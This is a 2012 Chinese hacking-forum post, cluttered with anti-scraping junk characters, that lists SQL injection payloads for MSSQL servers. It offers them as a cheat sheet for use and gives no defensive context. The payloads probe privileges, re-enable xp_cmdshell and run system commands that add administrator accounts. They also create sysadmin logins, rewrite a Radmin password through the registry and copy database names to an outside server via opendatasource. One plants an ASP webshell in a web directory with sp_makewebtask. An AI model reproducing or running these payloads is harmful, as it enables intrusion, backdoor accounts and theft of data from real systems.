找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1832|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令* S% U$ Z. s1 ]* N: [' l! _' O& r
//看看是什么权限的9 O# [3 U8 x8 r! f* L
and 1=(Select IS_MEMBER('db_owner'))
! A0 `- Q# Q6 m4 b7 VAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--6 ?1 O8 {& L' K  z

: O  {5 l( H: {4 e: y) s" s& H//检测是否有读取某数据库的权限
% u: C9 A4 r& Wand 1= (Select HAS_DBACCESS('master'))' U1 ]' ]3 b$ p, B/ K+ x
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --$ `2 g3 A- V4 p" \
7 \- ?0 F$ c! G8 U1 r

1 r0 A, Z  P5 u5 T! p3 W4 v4 t' F数字类型
$ a  O2 ]7 ]4 f  y; kand char(124)%2Buser%2Bchar(124)=0
. T$ W) `% p; S
6 M$ |( E" f8 J字符类型
9 X0 S& d2 J. e' z3 m0 U' and char(124)%2Buser%2Bchar(124)=0 and ''='% E% Z+ u2 s" p( y

3 e2 K: k) L2 J搜索类型! `% s7 j! N6 _# q& J4 ^: l3 A
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
. z( \0 \" ~4 I% D% U: f9 G
) y) R# F$ k% f. y/ G爆用户名0 @; l' ?8 p. T. Z" f& y
and user>0
/ r6 p6 ]9 t. @, }" M, n- ]' and user>0 and ''='# O4 l+ H) y6 b% ^
& Z* N' V4 I& O% e# O$ x
检测是否为SA权限
, ]4 ]5 M" v) u7 f1 _, |; qand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
# X* J; A1 j1 v6 L& X% fAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --* u" P  |5 @/ U7 b; x7 t2 p- F

2 z' \' T% R: X检测是不是MSSQL数据库
# i0 L6 S0 |1 B2 b  M6 Vand exists (select * from sysobjects);--
& G, G" b& u9 c/ c( V
! m2 K; W2 |8 J7 t6 r% R检测是否支持多行
9 X! W( r8 p5 d  n* e$ H;declare @d int;--
) a+ t' I7 L6 A. g$ j8 {' m! Y2 ~; {5 g1 z
恢复 xp_cmdshell9 m0 ^, m7 w: W7 Z/ |
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
& Y7 a1 C: B# r7 D% S+ m5 r/ C5 b, p2 o3 g
  y; Z5 G# m3 }5 n) D( P  {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') * r& t  @& K2 ?* \4 q: d. A
, ?9 V( R) Z$ d) }" M4 c" ?
//-----------------------
' n, Z" P& ~8 \/ w, A: D//      执行命令
, Q5 ~2 H! a1 y& @9 K//-----------------------+ v7 q  Y9 y0 [
首先开启沙盘模式:% F: k. t# p- o( c7 ?
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# ]% s) W* q6 I! [) {
- }. _; S/ o2 V- f6 {然后利用jet.oledb执行系统命令- ^4 W% T# @% b% X4 Z( g
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')9 f' x+ L' m  w8 c* v1 W

2 K# p* _4 z4 s  ?  k3 Z执行命令) [4 N5 t6 |- u5 B
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--+ `9 C" o& p! R& ]$ p

8 b0 x4 Z/ P$ e$ B2 ]! l/ z1 OEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
, \0 t/ h% z3 l# S& V2 p6 c6 b( ?& _7 C  M+ C1 _# O% h* g# U$ k
判断xp_cmdshell扩展存储过程是否存在:
- P2 n/ n3 ~' H9 khttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')' Y+ ~) N0 w2 k  C8 A. t2 N

% p" [: m7 T0 @6 ^( U写注册表. H" a5 X3 Q1 k; \) X  y+ E
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1( a0 f4 ^# @9 R7 C1 @; O2 Y

7 ^0 @( D6 q; J: n" o/ T6 FREG_SZ
" Z% p) E2 s! z, L; b8 f2 I4 f3 Z0 V
读注册表
6 q* z5 y; i- ?" ?" W6 N: Eexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
- k* I! f0 M, J7 b  X# e# L( Y. k  r
; v9 C2 k  e- |3 j6 t) P0 ^! A* q读取目录内容% F% E6 e: v+ M/ d7 p3 s  q
exec master..xp_dirtree 'c:\winnt\system32\',1,1- y) o: {1 O% b8 s! c+ O

; ~+ e2 y4 g' q
( j* e: c. A1 g5 z9 ?数据库备份
6 u! F8 Y, M+ q- h  jbackup database pubs to disk = 'c:\123.bak'
7 ^8 C  j& I/ g! I9 _0 Z$ S
7 y1 D4 ^  r4 O  A# w- U" F! e" p//爆出长度6 j2 E# b/ e2 S# v
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
' o, X) n& x# L
9 R5 o) A/ [4 u, A# K
7 n' V# R3 [1 J- y
9 `  Y; ]  S% h1 X! d/ z: V更改sa口令方法:用sql综合利用工具连接后,执行命令:
  t# x( q( f, H4 J! Bexec sp_password NULL,'新密码','sa'
+ W! l' q7 r, l% ]- f& r# ?- ~  L* U1 l$ e. L  P5 b
添加和删除一个SA权限的用户test:3 _  ^4 ]+ b6 N  ]0 W
exec master.dbo.sp_addlogin test,ptlove. R% Z6 o$ B2 [2 _
exec master.dbo.sp_addsrvrolemember test,sysadmin
" y7 M6 c& b! E7 f, V' r7 O
" P( Z8 d! w# b( ~9 P7 D; b删除扩展存储过过程xp_cmdshell的语句: 6 N/ l0 x3 p" T. U
exec sp_dropextendedproc 'xp_cmdshell'
( T' J2 s2 |! w- h
2 S" U( a" s* n, [( R: e, N添加扩展存储过过程
+ K& X. {* X% d8 t4 n, _0 U7 g+ gEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' . ^( `( K; T+ g0 K" [0 {3 a
GRANT exec On xp_proxiedadata TO public
* C. V8 X8 `  `* L3 W0 z, R5 S

$ ?& {( A# \4 K. g: z2 v停掉或激活某个服务。
( ?; Y" k7 J5 y8 @2 u" J; V  K& \/ Q) j! d
exec master..xp_servicecontrol 'stop','schedule'
: \9 ^. P3 V8 _" aexec master..xp_servicecontrol 'start','schedule'$ r* K$ \+ M( x

+ t; a9 a; K3 Mdbo.xp_subdirs
, t+ }2 Q4 N2 C2 E) N" i- B8 ?  h/ [  o* r, `( ]
只列某个目录下的子目录。5 W6 p+ \/ l* m/ E, `
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'# e* ^! z. r" h
( v% T) e; r/ ]3 G
dbo.xp_makecab
5 p/ x5 L4 B, J+ `
$ W7 O( m* {) R( X* {$ _将目标多个档案压缩到某个目标档案之内。
" `. F; Q2 q5 O& u1 ^. U所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
' y+ [" w1 R) ~  Z+ }% f, d
8 F9 ^  H4 @. B' W) Rdbo.xp_makecab
/ a7 h! t# \% k, u$ s' W'c:\test.cab','mszip',1,
! O) \* ?* j' _9 ]) S9 V'C:\Inetpub\wwwroot\SQLInject\login.asp',1 r# H& p- R1 B
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'' m% E1 G6 |( G. f
& [( f7 D9 c4 \
xp_terminate_process
3 I) D2 B  D0 E# |- s
4 k; D5 u) i5 p& A停掉某个执行中的程序,但赋予的参数是 Process ID。
; U4 [7 G# ?4 t4 x利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID) m$ T( A; X+ A. N) l9 \1 S- F0 s1 f- D

; H; S5 D$ Q6 r6 [7 E. e, u' @xp_terminate_process 24840 M! A3 N  f% p+ k. z

' l5 n- e( V* M6 yxp_unpackcab
8 U- r# I, a2 |- L3 C3 f! @6 ~% Q
解开压缩档。
. v) y. L' ^& ~. [: K  {* p, t6 H0 |, ], s1 I: [2 |5 ~9 h" F
xp_unpackcab 'c:\test.cab','c:\temp',1- |$ x. I3 s- Y) `$ W

9 Z6 M/ C3 |2 r* C( u
) R6 J% G; s& K某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12346 ~1 K6 L0 d% J3 A+ j! p1 ?" N

5 q) N* \$ }% _% j( wcreate database lcx;
" O1 v& C6 N. H$ b3 n9 }Create TABLE ku(name nvarchar(256) null);! M' f1 X+ T3 _% A! \
Create TABLE biao(id int NULL,name nvarchar(256) null);
5 ?& B  X& i8 d" S# t$ c0 E2 z6 [, W! k
//得到数据库名7 L( k5 |) A5 A+ h9 K& w
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases3 R0 e# q$ O* ~) o0 \( P/ @
# Z8 ?* @7 F7 W$ P& J* b
9 }. L8 Y* w$ o# B- v6 J
//在Master中创建表,看看权限怎样: |2 d- D8 e" Q
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--4 z/ Y2 c+ \: [0 F" u
8 Y& U5 J0 c2 G. L% _2 P- g) C
用 sp_makewebtask直接在web目录里写入一句话马:
+ h0 f* w5 s2 Ihttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--- p' D' |. y) e" u/ a
  U* U1 S9 j% J' U4 ?. i( R
//更新表内容
5 p) n$ O& E$ t# m) e/ h# fUpdate films SET kind = 'Dramatic' Where id = 123
. \& U9 ~( g0 o0 D* S/ B+ f+ B6 [( N
5 N* ^1 F2 l" C) p//删除内容
. f% E4 z$ v7 D# W2 S9 y: N+ t* ~delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表